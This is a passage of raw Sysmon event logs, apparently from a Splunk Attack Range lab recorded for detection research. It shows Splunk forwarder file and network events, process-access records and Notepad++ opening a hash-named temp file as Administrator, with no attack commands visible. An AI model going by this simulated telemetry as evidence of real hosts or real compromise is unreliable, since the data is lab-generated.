Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5607823208215073BA7062BADB5D67EC,SHA256=DA4C63930F6814547686EA4631531EEF3BCB96B2D9E1A105F7C38FE183ECB33F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217593Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:07.732{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=54F4406259942CA5FBAE4A647EE8A767,SHA256=F92C9FD53AC348EE709DC3BF23382A02598DAE0A70C05F8A3906BAB44FB31A7C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289866Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:08.822{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A0FE8FF0D47304E0F4CAE964228D4CE3,SHA256=4CF1EE6426EF17FAB88FBF4FD2514E35E8CC37C90DA5B09D15D0C4510E9AACDD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217594Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:08.748{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE942EC0D9F73F3172F825BD222EBB86,SHA256=ADA1045BFB00AB8C7381EC034ACD2FEBA4957EA0E1CD0B9724C14F35CB163D7A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217595Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:09.764{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3CD84820761EA8F279B32E861FD7B945,SHA256=A154C8CB3B623F9BB49320A0C56BD197DF09325D94626FEDFEF5AD5061FCE0DC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289867Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:09.837{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE461A5A1010802106230FBA0DF7171B,SHA256=D5B5CA7F70EAD435E5153A351C71F41C23CFE74F800FEA3992ED13EB505382B2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289869Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:10.852{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5BEC44941ADE3DB89DC3C82F99ACD69B,SHA256=4D9FB3289D4BAD25114D6F63F99DE322C700E5EC5D9D3080CA5ECDFD169AA6B0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217596Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:10.779{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D792628D8CA5F0ADFE34D85C7F68DE7,SHA256=3197465253CBACE11065CFA7D015C01D8782FBF71274A6883E2EAB25C5FFD941,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000289868Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:08.561{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53553-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000289870Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:11.867{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BFA301572643A739801BE8013A7C01A5,SHA256=9D07454F5DFF63AB64FE2F7913E25B6D79165843F749E02B2E99CEC59662EF2D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217598Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:11.795{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E53C9181D38EF8A8FC25D8E385BD58DB,SHA256=1370CB8284B1EE81A497A263972A8C449C5EABB3908FA228ADA05D4B7E480F6F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000217597Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:08.632{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51404-false10.0.1.12-8000- 10341000x8000000000000000289885Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:12.936{C8EA50B7-F2AD-6215-C000-000000003802}48565124C:\Windows\Explorer.EXE{C8EA50B7-F33D-6215-E300-000000003802}4920C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289884Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:12.936{C8EA50B7-F2AD-6215-C000-000000003802}48565124C:\Windows\Explorer.EXE{C8EA50B7-F33D-6215-E300-000000003802}4920C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289883Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:12.936{C8EA50B7-F2AD-6215-C000-000000003802}48565124C:\Windows\Explorer.EXE{C8EA50B7-F33D-6215-E300-000000003802}4920C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000289882Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:12.889{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F6DED1DB0EB595ACDE5BA2AD953A9CBA,SHA256=7E23D2D6BE226AFA2A1501CB4C0DA691F064DF440F3C7E8572F90B413A29D21F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217599Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:12.810{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=63B86AED6449559AC1C2E53BA6E914F8,SHA256=71B1A318809E5D866E415AEFCE0667BC4252B1822CD966886B236395A0C6016F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000289881Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:12.867{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-F33D-6215-E300-000000003802}4920C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+639b0|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289880Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:12.867{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-F33D-6215-E300-000000003802}4920C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47d70|C:\Windows\System32\SHELL32.dll+6396c|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289879Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:12.867{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-F33D-6215-E300-000000003802}4920C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63940|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289878Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:12.867{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-F33D-6215-E300-000000003802}4920C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d549|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289877Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:12.489{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289876Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:12.489{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289875Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:12.489{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289874Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:12.489{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-12CC-6216-4505-000000003802}6288C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000289873Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:12.489{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289872Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:12.489{C8EA50B7-F2AD-6215-C000-000000003802}48565992C:\Windows\Explorer.EXE{C8EA50B7-12CC-6216-4505-000000003802}6288C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Notepad++\NppShell_06.dll+4449|C:\Program Files\Notepad++\NppShell_06.dll+46a6|C:\Windows\System32\SHELL32.dll+80407|C:\Windows\System32\SHELL32.dll+6731e|C:\Windows\System32\SHELL32.dll+17c35c|C:\Windows\System32\SHELL32.dll+19eb28|C:\Windows\System32\SHELL32.dll+2846f3|C:\Windows\system32\explorerframe.dll+13cf7b|C:\Windows\system32\explorerframe.dll+139d07|C:\Windows\System32\SHELL32.dll+17c600|C:\Windows\System32\SHELL32.dll+179a7e|C:\Windows\System32\SHELL32.dll+73861|C:\Windows\System32\SHELL32.dll+76746|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53 154100x8000000000000000289871Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:12.435{C8EA50B7-12CC-6216-4505-000000003802}6288C:\Program Files\Notepad++\notepad++.exe8.31Notepad++ : a free (GPL) source code editorNotepad++Don HO don.h@free.frnotepad++.exe"C:\Program Files\Notepad++\notepad++.exe" "C:\Temp\736cc21f68c2104408e298b15457d84cd0253042"C:\Windows\system32\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=22E0726AC6C0C0F02C23DED4EAB8D2AA,SHA256=29BF69434A4DDBF59B4E3C3204A2C578A4F3496AAB1B6D146A0A24F899001420,IMPHASH=02B57A4AEE77BD45F4E2BA098351FBBA{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 23542300x8000000000000000289886Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:13.905{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C2CB3AAEA4426CEB16A1489760EF8B00,SHA256=499A58A4CBD835E549A96446C6F689D00DA62497C8BB75FE36DB96CF9AA8C054,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217600Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:13.826{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=348EB8A8281EB85442A42D8E8A3420AD,SHA256=25048131F8F98E77660B60711BCCB434D07C59DDFABC99BA5E85A8EF97051E81,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289887Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:14.907{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A6D0DF8651E939164CB6F8ED7B8AC19,SHA256=7FF650F5387E01D7992B33E71C98B3FBB02D7AD0BFAC611F6F0565208907177D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217601Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:14.841{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D577885C86DC43E778040CF730834374,SHA256=26865814FD52F63609BC09CC9CE8BD33F270A6E7F23DA7AFEA65A22C04021602,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289888Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:15.907{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9094418697CFC7D0F3C3F0A8D72CB84A,SHA256=527AB94E4A865765036A79917904463815B23CE9E3E50FB94AACB389C4CC8DF5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217602Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:15.857{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=700322DC8AFCEAB222C59B93F0BDCF52,SHA256=17C0C0433CC881955919F5CF3DBE85DD494FA18E02D7566F1B0CA4A54C15A97E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289890Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:16.960{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C28132E8949B95ADD8F1AC6A4278319,SHA256=A3FD517573109CC94AFF0D18BCD0823A101A0F920EA810956AF52168F880D494,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217603Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:16.872{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3B7EAE33ECF1B0B125E67B567E6F9792,SHA256=33083EEF036D0CEF06EAF487C07803AC54E340F18A85EB883F17F2582A383CCF,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000289889Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:14.580{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53554-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000289891Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:17.963{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A2F9C0DB08C7CAA51F08867126D70E24,SHA256=95A8B29942C9C12053367DB9021882E3F6B868122C38749761AEDDC762426DD8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217605Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:17.888{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C48F76650B3ADB1233923F37D0228ED5,SHA256=B875624E644945561D9B6B620FFE5270700895DB20B65AA6D34DA42DC5D6EC32,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000217604Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:14.616{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51405-false10.0.1.12-8000- 23542300x8000000000000000289892Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:18.977{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=367054797316E4097ADC0F9BE2FBFDDE,SHA256=346B129F436C322DC369872D7114599C163FD1451AE5C5287B29BE9BD7DD8042,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217606Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:18.903{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 